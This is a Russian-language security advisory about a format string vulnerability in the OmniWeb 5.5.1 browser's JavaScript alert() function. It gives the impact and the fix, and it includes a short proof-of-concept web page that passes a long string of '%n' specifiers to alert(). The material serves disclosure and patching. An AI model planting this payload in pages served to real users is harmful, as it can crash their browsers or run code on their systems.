Security Lab

Уязвимость форматной строки в браузере OmniWeb

Дата публикации:09.01.2007
Дата изменения:27.01.2008
Всего просмотров:3655
Опасность:
Высокая
Наличие исправления: Да
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Отказ в обслуживании
Компрометация системы
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: OmniWeb 5.x
Уязвимые версии: OmniWeb 5.5.1 (v607.5) на Mac OS X 10.4.8

Описание:
Уязвимость позволяет удавленному пользователю вызвать отказ в обслуживании или выполнить произвольный код на целевой системе.

Уязвимость форматной строки обнаружена при обработке Javascript функции "alert()". Удаленный пользователь может с помощью специально сформированной Web страницы выполнить произвольный код на целевой системе. Пример:

<html>
<head>
<title>MOAB-07-01-2007</title>
<script>
/* LMH */
function boom() {
var str = 'A';
while (str.length <= 32) str+=str;
str = str + '%n%n%n%n%n%n';
alert(str);
}
</script>
</head>
<body>
<input type="button" onclick="boom();" value="Test MOAB-07-01-2007" />
</body>
</html>

URL производителя: www.omnigroup.com/applications/omniweb/

Решение: Установите последнюю версию (5.5.2) с сайта производителя.

Ссылки: MOAB-07-01-2007: OmniWeb Javascript alert() Format String Vulnerability